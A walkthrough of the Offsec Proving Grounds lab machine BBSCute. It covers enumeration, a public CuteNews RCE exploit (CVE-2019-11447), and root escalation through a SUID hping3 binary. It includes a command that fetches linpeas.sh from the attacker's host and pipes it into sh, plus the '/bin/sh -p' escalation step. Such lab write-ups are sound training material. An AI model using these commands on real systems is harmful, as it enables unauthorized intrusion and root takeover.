Offsec Proving Grounds - BBSCute Walkthrough

# Offsec Proving Grounds - BBSCute Walkthrough ### Machine Details #### Name: BBSCute #### IP address: 192.168.118.128 #### Difficulty: Easy #### Points: 5 --- ## Initial Enumeration I started the box and was assigned the IP address 192.168.118.128. My first step was to conduct a scan. For this purpose I used nmap and found the following ports open: `22, 80, 88, 110, 995`. ![](https://i.imgur.com/okvy6jg.png) Conducting further enumeration, I entered the IP address into the browser and I was presented with the page below: ![](https://i.imgur.com/VjpX2Jy.png) There is also a web service running on port 88 so I visited the page also but was greeted with a Not Found error. ![](https://i.imgur.com/xlrDBsx.png) I then proceeded to do some directory enumeration on both web services using gobuster. ``` gobuster dir -u http://192.168.118.128 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster.out gobuster dir -u http://192.168.118.128:88 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster.88.out ``` While that was running, I went back to the web service on port 80 and was finding around. Since the page presented an Apache default page, it will most likely be running PHP. So, I tried visting /index.php and alas, I was presented with a new page running the CuteNews CMS. ![](https://i.imgur.com/HeqBfqr.png) Since I don't have credentials, I proceeded to using the register option. I registered the user rudefish. ![](https://i.imgur.com/bm7HlTj.png) One thing I noticed on the registration form was that the captcha was not visible and it is required. What I did was to refresh captcha and then monitor the network request to obtain the value from the response. ![](https://i.imgur.com/3mvStb9.png) Supplying the captca value, huqora, I was registered and redirected to a dashboard. ![](https://i.imgur.com/Lh60O01.png) ## Gaining access One thing that caught my attention on the dasboard was the CuteNews version (I missed this on the login page). I proceeded to search Google for this version and found that it is vulnerable to a remote code exploit (RCE). ![](https://i.imgur.com/BrEpg7V.png) Visting the link highlighted above for [CVE-2019-11447](https://github.com/thewhiteh4t/cve-2019-11447), it explains the exploit and how to use it. I cloned the repo and followed the instructions provided as shown below. ![](https://i.imgur.com/XXGYLjV.png) ## Editing /etc/hosts file Although I provided all parameters, I was still getting an error. The error was due to the URL returned from the webpage - http://cute.calipendula/uploads/avatar_rudefish_rudefish.php. Since our machine does not know this address and cannot resolve it, it gives a connection error. To solve this, I added the address to my /etc/hosts file. ``` 192.168.118.128 cute.calipendula ``` ![](https://i.imgur.com/vpygkg7.png) After doing this, I ran the exploit again and now I got a shell. ![](https://i.imgur.com/naT1b5Q.png) ## Give me local.txt Just moving around on the box, I changed directories and found the local.txt file at the /var/www folder. ![](https://i.imgur.com/OJN0rOK.png) In case you navigated to the home folder directly and could not find the file (obviously :XD), you can find it (since we know the name) using the command below: ``` find / -type f -name local.txt -ls 2>/dev/null ``` ## Finding ways to elevate privileges One of the first things I do when I gain initial foothold is to find out which commands I can run as other users using sudo. So I ran the command below. ``` sudo -l ``` ![](https://i.imgur.com/au3UJp3.png) Great! We can run the hping3 with the icmp option as root. Truth is, I spent quite some time on this trying to use it to gain a root shell as I found from research but I could not make it work (probably a rabbit hole). To work, the command should have been ``` (root) NOPASSWD: /usr/sbin/hping3 --icmp * ``` So I moved on to upload and run [linpeas.sh](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) on the machine and this retuned an interesting result. ``` On my box python3 -m http.server 80 ``` ``` On machine wget -O- http://192.168.49.118/linpeas.sh | sh - ``` ![](https://i.imgur.com/5ucth7p.png) ![](https://i.imgur.com/yxr1wS7.png) Linpeas.sh found that the hping3 binary has the SUID bit set as the root user. You can read more about SUID binaries here - [SUID](https://www.techrepublic.com/article/linux-101-what-is-the-suid-permission/). In case you do not like enumeration scripts, you could have found the binary by running the following command: ``` find / -type f -perm -04000 -ls 2>/dev/null ``` ## Give me ROOT!!!! Now all we have to do is run this binary, get a prompt and find a way to get a shell from it. A nice place to find such things out is [gtfobins](https://gtfobins.github.io). At this point, we need to get a proper shell. For this, I used a bash reverse shell and then elevated it using python pty shell. ![](https://i.imgur.com/EAW5kYC.png) To get a root shell, we just need to run: ``` /usr/sbin/hping3 hping3> /bin/sh -p ``` ![](https://i.imgur.com/Feu94m9.png) Now we can read the proof.txt and we're done! ###### tags: `offsec proving grounds` `BBSCute` `CTF` `CuteNews` `suid`